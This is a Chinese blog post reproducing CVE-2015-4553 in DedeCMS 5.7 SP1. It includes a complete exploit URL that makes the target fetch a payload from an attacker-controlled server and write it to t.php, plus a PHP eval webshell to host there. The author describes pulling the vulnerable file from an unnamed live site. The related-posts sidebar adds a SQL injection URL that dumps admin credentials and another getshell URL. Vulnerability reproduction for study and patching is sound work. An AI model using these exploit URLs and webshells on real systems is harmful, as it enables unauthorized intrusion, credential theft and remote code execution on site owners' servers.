Dedecms织梦远程写文件漏洞

最新推荐文章于 2022-11-06 14:50:36 发布
最新推荐文章于 2022-11-06 14:50:36 发布
阅读量907 收藏 5
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rpsate/article/details/119179476
版权

基本信息

漏洞编号:SSV-89354 CVE-ID:CVE-2015-4553 漏洞类别:变量覆盖 实验版本:dedecms
v5.7SP1(部分版本已修复) 利用条件:Apache,dedecms版本为v5.7SP且未修复,自备一台云主机
云主机ip:192.168.18.131
参考文章:http://blog.nsfocus.net/dedecms-write-file-vuln/
https://seclists.org/fulldisclosure/2015/Jun/47

2015年6月17日seclists网站上公布了Dedecms的一个远程getshell漏洞细节:官方已在2015年6月18日发布了修复版本。

Introduction:
========
dedecms Open source cms
Extensive application

Influence version 
Newest dedecms 5.7-sp1 and all old version

Remote getshell

我测试了5.3版本,发现没有这个漏洞。后来测试了v5.7-SP1,发现我下载的这个版本已经修复了这个漏洞。后来我抱着试试运气的心态在网上找现存的靶机,访问这个存在漏洞的页面:http://xxxxx.com/install/index.php.bak,结果直接把这个页面下载下来了,打开一看,发现正好是有漏洞的代码。果断把这个文件替换本地的index.php.bak。然后就有后面的步骤。

前置知识

dedecms会把通过GET提交的参数转化为变量。

例如:打开localhost?test=hello world,然后代码就会生成一个$test变量,值为"hello world"。

Apache解析文件的流程:

当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。

像1.php.bak这样的文件名就会被当做php文件所解析。这也就是传说中的Apache解析漏洞。

利用思路

  1. dedecms如果初始化过,就会生成一个文件**/install/install_lock.txt**,访问**/install/index.php.bak是首先判断/install/install_lock.txt是否存在,不存在则继续执行代码。我们得想办法让这个文件不存在,让index.php.bak**执行。
  2. 在执行**/install/index.php.bak时,如果$step==11会执行一句写文件的代码,其中文件名可控**,写的内容从远程获取,这个远程地址可控。把这个远程地址改成自己服务器,就可以把自己的文件内容再到目标服务器上。

代码分析

文件地址**/install/index.php.bak**,35行

if(file_exists($insLockfile))
{
    exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
}

访问这个页面加上参数**?insLockfile=aa就可以跳过这里的exit()**函数,其中aa为任意值。

文件地址**/install/index.php.bak**,372行

else if($step==11)
{
   require_once('../data/admin/config_update.php');
   $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
   $sql_content = file_get_contents($rmurl);
   $fp = fopen($install_demo_name,'w');
   if(fwrite($fp,$sql_content))
      echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
   else
      echo '&nbsp; <font color="red">[×]</font> 远程获取失败';
   unset($sql_content);
   fclose($fp);
   exit();
}

我们提交参数?updataHost=http://192.168.18.131/(注意地址后面的斜杠),$rumurl就会等于“http://192.168.18.131/dedecms/demodata.utf-8.txt”$s_lang等于utf-8gbk,可以在前端查看,在这里也可以传递一个参数把$s_lang覆盖)。同时提交参数?install_demo_name=./t.php,我们的利用代码就会写在/install/t.php中。

漏洞复现

1.配置dedecms

  1. 解压DedecmsV53-UTF8-Final并移入网站根目录。

  2. 打开首页,根据指引完成网站初始化。

    http://localhost/DedecmsV53-UTF8-Final/upload/
2.配置服务器

在自己的服务器上创建文件夹dedecms,本在这个文件下创建一个文件:demodata.utf-8.txt。在这个文件里写入一句话木马:<?php @eval($_GET[a]);?>.

在这里插入图片描述

在这里插入图片描述

3.写入木马

访问下面链接,下面浏览器是写入成功的样子。

http://localhost/DedeCMS-V5.7-UTF8-SP1/uploads/install/index.php.bak?insLockfile=a&step=11&install_demo_name=./t.php&updateHost=http://192.168.18.131/

在这里插入图片描述

其中insLockfile指定a,是因为a不存在,当insLockfile指定的文件不存在时程序就会认为没有初始化过,就会继续执行初始化代码。step是指定初始化的步骤,漏洞代码出现在第11步。install_demo_name是指定要写的文件,updateHost是指定要获取的远程的文件,并把这个文件的内容写在install_demo_name文件里。

4.成功

在这里插入图片描述

然后可以用菜刀连接,success!!!!

rpsate
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
dedecms最新版本存在远程包含漏洞--可getshell
pygain的博客
11-01 2226
小编最近发现,9月中旬发布的织梦CMS,由于管理员疏忽易存在远程包含漏洞,可getshell
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现)
kid的博客
06-05 5971
远程文件包含漏洞dedecms5.7 sp1版本漏洞复现) 前言 前面看一个视频提到这个漏洞的复现,自己觉得这种漏洞复现然后分析原因还是蛮有意思的,所以这里也来实现一下这个漏洞的复现,自己动手还是很重要的一个过程吧 过程 首先是搭建环境,phpstudy + dedecms5.7 sp1基本是一键安装 漏洞原因主要是在install的index.php文件中 foreach(Array('_...
dedecms织梦 标签远程文件漏洞
weixin_34261415的博客
03-21 201
测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 前题条件,必须准备好自己的dede数据库,然后插入数据:   insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp =@fopen("1.php", \''a\'');@fwrite($fp, \''\''...
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)
WY92139010的博客
08-14 1025
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553) 一、漏洞描述 该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖,以至于最后引起远程文件包含漏洞。 二、漏洞影响版本 DeDeCMS < 5.7-sp1,包括5.7 sp1版本 三、漏洞环境搭建 1、下载DeDeCMS V...
DedeCMS V5.7 SP1远程任意文件漏洞(CVE-2015-4553)
末初的CSDN博客
05-18 2314
文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现 漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本 漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理 继续分析 uploads/install/i
dedecms织梦首页分页插件_hexo分页_dedecms_织梦csm_
10-03
织梦CMS默认首页文章列表是不能分页的,但是我这个网站主页做个人博客网站的,首页要用到分页,所以装了织梦首页分页插件这个插件来实现。但是装完插件后发现,首页分页URL地址是index**.html这种格式,和我原来hexo...
织梦dedecms转wordpress插件
10-18
织梦dedecms转wordpress插件,该插件可以把织梦数据完整的转到wordpress并保持源链接不变不影响SEO,该插件可以把织梦的,系统参数、栏目分类、栏目内容、栏目TDK、文章内容、文章自定义字段、友情链接、一起转入到...
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
织梦dedecms建站详细教程.doc
01-12
织梦DEDecms建站详细教程 DEDecms是一款流行的内容管理系统,拥有强大的功能和灵活的架构。本教程旨在指导读者快速搭建一个基于DEDecms的网站,涵盖环境配置、程序安装、系统文件夹讲解等多个方面的内容。 ...
dedecms织梦系统短信插件.zip
11-02
实测可用,易对接,3-5秒到达,支持查询状态回执
织梦漏洞
showso2006的专栏
09-06 1011
<br />最近网站被人挂马,360狂报,真的很影响网站形象。<br />经检查,原来是织梦的模板机制漏洞,只要利用织梦的会员管理功能,发表文章,上传一个带有gif89a的欺骗图片,再访问那篇文章即可以执行脚本代码。然后实现上传木马脚本到网站,就可以为所欲为。<br /> <br />另外,即使你清除了木马,用360检查还是会报警的,只有等360再次检查时发现没问题,才会清除报警。如果要快,可以使用360的验证码嵌入到网站,登录自己的账号,点击验证,大概需要在半小时之后才会再次检查。
dedecms 躺着也中枪 爆重装漏洞
ITfinder
06-30 226
利用条件:web server: apache漏洞原因::apache 不认识bak 直接当php执行. http://webshell.cc/install/index.php.bak?insLockfile=1 这dedecms死的太冤枉了. apache的原因. 原文地址:http://www.webshell.cc/4379.html   不过这个问题并不会影响太大,因为当进行...
DeDecms远程漏洞webshell (dedecms漏洞)
aomiano55778的博客
02-19 2725
解释下Apache解析文件的流程: 当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。 那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也...
mysql5.5.57 漏洞_DEDECMS织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 845
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
dedecms远程文件包含漏洞
weixin_43778463的博客
11-06 1033
dedecms远程文件包含漏洞
dedecmsv5.7sp1远程文件包含漏洞审计
安全大白
10-27 767
漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖以至于最后引起远程文件包含漏洞
dedeCMS后台上传getshell漏洞(CNVD-2018-01221)复现
weixin_44897902的博客
10-27 1554
漏洞名: CNVD-2018-01221 影响: Dedecms v5.7 sp2 危害: 任意代码执行,getshell; 准备工作: win7虚拟机+Dedecms v5.7 sp2+phpstudy 首先安装Dedecms v5.7 sp2: http://www.dedecms.com 下载安装之后直接访问localhost/Dedecms v5.7 sp2/uploads 会自动跳到...
Dedecms V5.7 sp2后台getshell漏洞复现(第一处)
weixin_42558965的博客
09-28 1038
前言:为了简便,试用了phpstudy 下载dedecms V5.7 sp2 使用phpstudy新建网站www.dedtest.com,并将下载的dedecms V5.7 sp2复制到其网站目录下,然后建站 开始复现 漏洞的只要原因是出现在了C:\phpstudy_pro\WWW\www.dedtest.com\dede文件夹下的sys_varifiles.php文件,一下为代码: /*----------------------- 下载文件 function _getfiles() ----------
dedecms 漏洞汇总
热门推荐
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
dedecms文件上传漏洞有哪些
最新发布
05-16
DedeCMS文件上传漏洞主要有以下几种: 1. 文件类型检查漏洞DedeCMS 在上传文件时,只做了文件扩展名的检查,而没有检查文件的真实类型,导致攻击者可以通过伪装文件类型的方式来上传恶意文件。 2. 目录遍历漏洞DedeCMS文件上传时,未对上传的文件路径进行限制,攻击者可以通过构造特定的文件名来绕过上传目录的限制,实现目录遍历攻击。 3. 文件名绕过漏洞DedeCMS 在上传文件时,未对文件名进行过滤,攻击者可以通过构造特定的文件名,绕过文件名检查,上传恶意文件。 4. 权限控制不严格漏洞DedeCMS文件上传时,未对文件上传目录的权限进行严格控制,攻击者可以通过上传恶意文件,覆盖或修改目标文件,实现攻击目的。 以上是 DedeCMS 常见的文件上传漏洞,需要开发者在开发过程中进行防范和修复。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

rpsate

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值